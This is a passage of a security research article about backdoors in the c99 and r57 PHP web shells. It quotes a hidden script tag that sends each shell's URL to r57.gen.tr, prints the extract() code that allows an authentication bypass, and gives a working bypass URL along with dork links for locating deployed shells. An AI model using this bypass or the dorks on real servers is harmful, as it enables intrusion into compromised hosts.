2926:<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>powered by</b></u></a> Captain Crunch Security Team | <a href="http://r57.gen.tr"><font color="#FF0000">r57 shell</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table>

mandatory@mandatorys-box:~/Pentest/c99$

-------------------------------------

But let's see with more attention here:

<SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>

And then, let's see where this page goes! (http://www.r57.gen.tr/yazciz/ciz.js)



Oops!

"a='+escape(location.href);"

it's not just a SIMPLE JavaScript Instruction, by using that command, the r57.gen.tr admins will be able to steal the sh3lls

of the other people for report them to the admins and/or taking actions with the Law Enforcement!

Ex. http://www.r57.gen.tr/yaz/yaz.php?a=[OUR URL HERE]


2) AUTH BYPASS METHOD

Let's looking into this Code!:


As We see there's an extract command!

With this, the attacker may be able to extracts the values into variables and it means changing how the sh3ll reads the credentials!.


With this, we can see that the variables $login, $md5_pass can be override and so we can bypass them from the sh3ll.

This is the Vulnerable Code:
---------------------------------------

[CODE]

//Highlight-code colors
$highlight_background = "#c0c0c0";$highlight_bg         = "#FFFFFF";$highlight_comment    = "#6A6A6A";$highlight_default    = "#0000BB";$highlight_html       = "#1300FF";$highlight_keyword    = "#007700";$highlight_string     = "#000000";@$f = $_REQUEST["f"];<strong>@extract($_REQUEST["c99shcook"]);</strong>//END CONFIGURATION// \/ Next code isn't for editing \/$tmp = array();if ($login) {    if (empty($md5_pass)) {        $md5_pass = md5($pass);    }    if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) {        if ($login_txt === false) {            $login_txt = "";        } elseif (empty($login_txt)) {            $login_txt = strip_tags(ereg_replace("&amp;nbsp;|&lt;br&gt;", " ", $donated_html));        }        header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt . "\"");        header("HTTP/1.0 401 Unauthorized");        exit($accessdeniedmess);    }}
------------------------------------------------------------------------------------------------

This line allows you to overwrite any variable using an array:

@extract($_REQUEST["c99shcook"]);

Which means if we change our URL like below, we can Bypass his restrictions!:

http://127.0.0.1/c99.php?c99shcook[login]=0

Et Voila!, Here is the Result!:



Now, you will know how to bypass the sh3ll restrictions without knowing his Password!

--------------------------------------------------------------------------------------

Source:
Security Researcher *ORIGINAL* Article(s):

1) http://thehackerblog.com/hacking-script-kiddies-r57-gen-tr-shells-are-backdoored-in-a-way-you-probably-wouldnt-guess/

2) http://thehackerblog.com/every-c99-php-shell-is-backdoored-aka-free-shells/

c99.php sh3ll Dorks:

http://www.hackingsec.in/2012/04/google-dorks-find-backdoor-c99-find.html

Vulnerable Sh3ll Code:

http://pastebin.com/LCDrr0e8

-------------------------------------

About the Author :
Christian Galeone () is a Cyber Security Researcher from Italy, he's currently studying to ITCL Marco Polo ( Upper-Secondary Technical Institute ) attending the IT Programming Class. 
He has been Acknowledged by the TOP 5 Companies including Yahoo!, Microsoft, AT&T, Sony etc.  His future goal is to be a Cyber Security Specialist working for the National Security in his Country.